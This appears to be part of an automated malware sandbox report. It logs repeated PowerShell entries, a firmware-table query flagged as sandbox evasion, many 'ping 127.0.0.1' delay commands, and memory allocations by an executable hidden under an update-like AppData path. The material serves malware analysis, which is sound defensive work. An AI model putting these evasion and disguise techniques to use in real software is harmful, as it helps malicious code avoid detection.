            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 11E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 2F40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 1560000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 60A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 70A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 81D0000 memory reserve | memory write watch
